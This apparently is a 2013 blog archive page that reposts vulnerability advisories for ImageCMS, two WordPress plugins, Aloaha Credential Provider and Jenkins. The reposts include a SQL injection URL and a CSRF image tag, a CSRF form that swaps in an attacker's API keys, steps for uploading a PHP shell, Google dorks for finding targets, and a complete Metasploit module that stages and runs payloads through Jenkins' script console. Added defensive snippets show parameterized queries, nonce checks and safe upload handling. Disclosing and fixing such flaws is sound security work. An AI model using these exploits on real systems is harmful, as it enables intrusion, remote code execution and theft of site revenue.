Archive for 25 January 2013

ImageCMS 4.0.0b Multiple Vulnerabilities

General SQL injection vulnerabilities were found in ImageCMS version 4.0.0b.
The exploit describing where the SQL injection occurs and how it is used is given below.

Advisory ID: HTB23132
Product: ImageCMS
Vendor: www.imagecms.net
Vulnerable Version(s): 4.0.0b and probably prior
Tested Version: 4.0.0b
Vendor Notification: December 5, 2012 
Vendor Patch: January 16, 2013 
Public Disclosure: January 23, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-6290
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in ImageCMS which can be exploited to perform SQL injection attacks.


1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create the file "/tmp/file.txt" with the MySQL server version inside:


http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202


This vulnerability can also be exploited by a remote non-authenticated attacker via a CSRF vector, because the application is prone to Cross-Site Request Forgery attacks. To do so, the attacker needs to trick a logged-in administrator into visiting a web page containing a CSRF exploit.

Basic CSRF exploit example:


<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">
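The defensive counterpart of the injection described above, added here as an editor's example and not ImageCMS's own code: a hypothetical admin search handler that splices the raw "q" value into the query text, beside one that binds it as a parameter. The table and column names, the LIKE pattern and the in-memory SQLite database used to run it are assumptions; the injection works the same way whichever engine sits behind the query.

```php
<?php
// Added example, not ImageCMS code. Table/column names and the handler
// shapes are assumptions; only the concatenation pattern is the point.

// Vulnerable pattern: the raw GET value becomes part of the SQL text, so a
// quote in "q" ends the string literal and the rest of the input runs as SQL.
function adminSearchVulnerable(PDO $db, string $q): array
{
    $sql = "SELECT id, title FROM pages WHERE title LIKE '%" . $q . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the SQL text is fixed at prepare time and "q" travels as a
// bound value, so the database never parses its contents as SQL.
function adminSearchSafe(PDO $db, string $q): array
{
    $stmt = $db->prepare("SELECT id, title FROM pages WHERE title LIKE :pattern ESCAPE '\\'");
    // Escape LIKE wildcards so "%" and "_" typed by the user match literally.
    $stmt->bindValue(':pattern', '%' . addcslashes($q, '%_\\') . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data in an in-memory SQLite database so the comparison runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO pages (title) VALUES ('Home'), ('Contact'), ('About')");

$q = "zzz' OR 1=1 -- ";   // constructed input: closes the literal, appends a tautology
printf("bound parameter: %d rows\n", count(adminSearchSafe($db, $q)));
printf("concatenation:   %d rows\n", count(adminSearchVulnerable($db, $q)));
```

Run under the PHP CLI with pdo_sqlite, the bound version returns no rows for that input while the concatenated one returns the whole table. Binding fixes the injection itself; the INTO OUTFILE write in the PoC additionally requires the MySQL account to hold the FILE privilege, which an application account should not have.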


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to ImageCMS 4.2

More Information:
http://forum.imagecms.net/viewtopic.php?id=1436
http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS.
[2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress SolveMedia 1.1.0 CSRF Vulnerability

A CSRF vulnerability was found in WordPress SolveMedia version 1.1.0. Through this vulnerability some malicious code can be executed and some information can be obtained from the site. The exploit code for the vulnerability is used as follows;

# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Release Date: 24/01/13
# Author: Junaid Hussain - [ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip
# Vendor Homepage: http://solvemedia.com
# Tested on: CentOs 5
# Google Dork: inurl:wp-content/plugins/solvemedia
-----------------------------------------------------------------------------------------------------------------------
//##### Introduction: 
SolveMedia is a captcha service that allows webmasters to monetize
correct captcha type-ins. solvemedia.admin.inc is vulnerable to CSRF:
no anti-CSRF tokens are implemented, nor is the wp-nonce function used,
so an attacker can change the webmaster's SolveMedia API keys (public key,
private key, hash key) to the attacker's own set of API keys, thus stealing
the webmaster's SolveMedia revenue.
-------------------------------------------------------------------------------------------------------------------------
//##### CSRF - Proof Of Concept:
<html>
<form  method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
<input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>                       
<input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
<input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
<input type="submit" name="submit" value="Enter" />	
</form>
</html>
\\##### End Poc #####
-------------------------------------------------------------------------------------------------------------------------
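The anti-CSRF check the advisory says is missing, written as an added example of how a WordPress settings form is normally protected; this is not the plugin's code or its 1.1.1 patch. It assumes a WordPress runtime, reuses the three field names from the PoC as option names, and the nonce action string is an assumption.

```php
<?php
// Added example, not the SolveMedia plugin's code. Runs inside WordPress;
// the option names and the nonce action string are assumptions.

const SOLVEMEDIA_KEYS_ACTION = 'solvemedia_save_keys';   // assumed nonce action
const SOLVEMEDIA_KEY_FIELDS  = array('adcopy_opt_pubkey', 'adcopy_opt_privkey', 'adcopy_opt_hashkey');

// Settings form: wp_nonce_field() emits a hidden _wpnonce input bound to the
// current user and time-limited, which a form hosted on another site cannot forge.
function solvemedia_keys_form() {
    echo '<form method="post">';
    wp_nonce_field(SOLVEMEDIA_KEYS_ACTION);
    foreach (SOLVEMEDIA_KEY_FIELDS as $field) {
        printf('<label>%1$s <input name="%1$s" size="40" value="%2$s"></label><br>',
               esc_attr($field), esc_attr(get_option($field, '')));
    }
    submit_button('Save keys');
    echo '</form>';
}

// Handler: refuse the update unless the caller may manage options AND the nonce
// is valid. check_admin_referer() stops execution on a bad or missing nonce, so
// an attacker's pre-filled form from the PoC never reaches update_option().
function solvemedia_save_keys() {
    if (!isset($_POST['adcopy_opt_pubkey'])) {
        return false;                     // nothing submitted on this request
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', '', array('response' => 403));
    }
    check_admin_referer(SOLVEMEDIA_KEYS_ACTION);
    foreach (SOLVEMEDIA_KEY_FIELDS as $field) {
        update_option($field, sanitize_text_field(wp_unslash($_POST[$field] ?? '')));
    }
    return true;
}

add_action('admin_init', 'solvemedia_save_keys');
```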
//##### Patch:
-- Vendor was notified on the 22/01/2013
-- Vendor released version 1.1.1 on 23/01/2013 which included a patch
--- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/
--- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/
-------------------------------------------------------------------------------------------------------------------------
//##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt

WordPress File Uploader Plugin PHP File Upload Vulnerability

The never-ending PHP file upload vulnerabilities in WordPress and Joomla continue to be found at full speed.
Again, the vulnerability found in the File Uploader plugin, one of the WordPress plugins, and how it is used are as follows;

# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux
 
Vulnerable Code: (process-form.php, lines 97-104)
 
$filepart = fileinformation( $_FILES['postimage']['name'] );
$filename = $filepart['basename'];
// check if this filename already exists in the folder
$i = 2;
while ( in_array( $filename, $imageslist ) ) {
    $filename = $filepart['filename'] . '_' . $i++ . '.' . $filepart['extension'];
}
move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);
 
Description:
 
The plugin simply uploads the attachment with its original name and extension to "wp-content/uploads/".
An attacker can upload PHP files and access them remotely.
 
Proof of Concept:
 
1. Visit vulnerable target and navigate to the "File Uploader" site.
2. Upload a file named shell.php
3. Access it with the browser on example.com/wp-content/uploads/shell.php
 
Done!
 
Proof Video: http://goo.gl/ogbsA
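A hardened replacement for the naming logic shown in process-form.php, added as an editor's example rather than the plugin's own fix. It keeps the original's $imageslist and $file_path variables and its uniqueness loop, and assumes an image-only allow-list; which extensions a site permits is its own decision.

```php
<?php
// Added example, not the plugin's code: a replacement for the naming logic in
// process-form.php. $imageslist and $file_path mirror the original's variables.

const UPLOAD_ALLOWED_EXT = array('jpg', 'jpeg', 'png', 'gif');   // assumed allow-list

// Return a safe destination name for an upload, or null if it must be rejected.
// Unlike the original, the stored name is generated server-side and the
// extension is checked against an allow-list instead of being copied from the client.
function safeUploadName(string $clientName, array $imageslist): ?string
{
    // Only the last extension counts, lower-cased: "shell.php" and "shell.PHP"
    // are both judged by "php" and refused.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, UPLOAD_ALLOWED_EXT, true)) {
        return null;
    }
    // Discard the client basename entirely: no path separators, no null bytes,
    // no second extension left for multi-extension handlers to pick up.
    $base = bin2hex(random_bytes(8));
    $filename = $base . '.' . $ext;
    $i = 2;
    while (in_array($filename, $imageslist, true)) {   // same uniqueness loop as the original
        $filename = $base . '_' . $i++ . '.' . $ext;
    }
    return $filename;
}

// Drop-in for the original move_uploaded_file() line: also verify the content
// is a real image before moving it into $file_path.
function storeUpload(array $file, string $file_path, array $imageslist): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK) return null;
    $filename = safeUploadName($file['name'], $imageslist);
    if ($filename === null) return null;
    if (@getimagesize($file['tmp_name']) === false) return null;   // content check, not just name
    if (!move_uploaded_file($file['tmp_name'], $file_path . $filename)) return null;
    return $filename;
}

// Constructed checks on the naming logic (no real upload needed):
echo safeUploadName('shell.php', array()) === null ? "shell.php rejected\n" : "BUG\n";
echo safeUploadName('photo.PNG', array()) !== null ? "photo.PNG accepted\n" : "BUG\n";
```

The name and content checks are the application-side control; configuring the web server not to execute PHP under wp-content/uploads is the complementary one.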

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

The local exploitation method for the Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation vulnerability, and how the vulnerability arises, are as follows;

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability


Vendor: Aloaha Software - Wrocklage Intermedia GmbH
Product web page: http://www.aloaha.com
Affected version: 5.0.226

Summary: Aloaha Credential Provider represents one of the most dramatic changes
in the Windows Vista / 7 logon screen, making it much easier to implement new user
authentication scenarios that are supported by the OS. Logging on to a Windows
machine via smartcard usually requires the machine to be a member of a domain.
With the Aloaha Credential Provider that is not required; the logon screen is
the first thing users see when they turn on the computer.

Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of
privileges vulnerability which can be exploited by an ordinary user, who can replace
the executable file with a binary of their choice. The vulnerability exists due to
improper permissions: the 'F' (full) flag is granted to the 'Everyone' group on the
'AloahaCredentialProviderService.exe' binary file. The service was shipped with
Aloaha PDF Saver and possibly every SmartCard software package from Aloaha. The
files are installed in the 'Wrocklage' directory, which has the Everyone group
assigned with full permissions, making every single file inside modifiable
by any user on the affected machine. After you replace the binary with
your rootkit, on reboot you get SYSTEM privileges.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5124
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php


19.01.2013


---------------------------------------------------------------------------------

C:\Program Files\Wrocklage>sc qc AloahaCPM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe
C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R


C:\Program Files\Wrocklage>

---------------------------------------------------------------------------------

Jenkins Script-Console Java Execution

The Metasploit exploit for the Jenkins Script-Console Java Execution vulnerability is as follows.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Jenkins Script-Console Java Execution',
			'Description'    => %q{
					This module uses the Jenkins Groovy script console to execute
				OS commands using Java.
			},
			'Author'	=>
				[
					'Spencer McIntyre',
					'jamcut'
				],
			'License'        => MSF_LICENSE,
			'DefaultOptions' =>
				{
					'WfsDelay' => '10',
				},
			'References'     =>
				[
					['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
				],
			'Targets'		=>
				[
					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
				],
			'DisclosureDate' => 'Jan 18 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
			], self.class)
	end

	def check
		uri = target_uri
		uri.path = normalize_uri(uri.path)
		uri.path << "/" if uri.path[-1, 1] != "/"
		res = send_request_cgi({'uri' => "#{uri.path}login"})
		if res and res.headers.include?('X-Jenkins')
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def on_new_session(client)
		if not @to_delete.nil?
			print_warning("Deleting #{@to_delete} payload file")
			execute_command("rm #{@to_delete}")
		end
	end

	def http_send_command(cmd, opts = {})
		request_parameters = {
			'method'    => 'POST',
			'uri'       => "#{@uri.path}script",
			'vars_post' =>
				{
					'script' => java_craft_runtime_exec(cmd),
					'Submit' => 'Run'
				}
		}
		request_parameters['cookie'] = @cookie if @cookie != nil
		res = send_request_cgi(request_parameters)
		if not (res and res.code == 200)
			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
		end
	end

	def java_craft_runtime_exec(cmd)
		decoder = Rex::Text.rand_text_alpha(5, 8)
		decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
		cmd_array = Rex::Text.rand_text_alpha(5, 8)
		jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
		jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"

		jcode << "String [] #{cmd_array} = new String[3];\n"
		if target['Platform'] == 'win'
			jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
			jcode << "#{cmd_array}[1] = \"/c\";\n"
		else
			jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
			jcode << "#{cmd_array}[1] = \"-c\";\n"
		end
		jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
		jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
		jcode
	end

	def execute_command(cmd, opts = {})
		vprint_status("Attempting to execute: #{cmd}")
		http_send_command("#{cmd}")
	end

	def linux_stager
		cmds = "echo LINE | tee FILE"
		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
		base64 = Rex::Text.encode_base64(exe)
		base64.gsub!(/\=/, "\\u003d")
		file = rand_text_alphanumeric(4+rand(4))

		execute_command("touch /tmp/#{file}.b64")
		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
		base64.each_line do |line|
			line.chomp!
			cmd = cmds
			cmd.gsub!(/LINE/, line)
			execute_command(cmds)
		end

		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
		execute_command("chmod +x /tmp/#{file}")
		execute_command("rm /tmp/#{file}.b64")

		execute_command("/tmp/#{file}")
		@to_delete = "/tmp/#{file}"
	end


	def exploit
		@uri = target_uri
		@uri.path = normalize_uri(@uri.path)
		@uri.path << "/" if @uri.path[-1, 1] != "/"
		print_status('Checking access to the script console')
		res = send_request_cgi({'uri' => "#{@uri.path}script"})
		fail_with(Exploit::Failure::Unknown) if not res

		@cookie = nil
		if res.code != 200
			print_status('Logging in...')
			res = send_request_cgi({
				'method'    => 'POST',
				'uri'       => "#{@uri.path}j_acegi_security_check",
				'vars_post' =>
					{
						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
						'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
						'Submit'     => 'log in'
					}
			})

			if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
				fail_with(Exploit::Failure::NoAccess, 'login failed')
			end
			sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
			@cookie = "#{sessionid}"
		else
			print_status('No authentication required, skipping login...')
		end

		case target['Platform']
		when 'win'
			print_status("#{rhost}:#{rport} - Sending VBS stager...")
			execute_cmdstager({:linemax => 2049})
		when 'unix'
			print_status("#{rhost}:#{rport} - Sending payload...")
			http_send_command("#{payload.encoded}")
		when 'linux'
			print_status("#{rhost}:#{rport} - Sending Linux stager...")
			linux_stager
		end

		handler
	end
end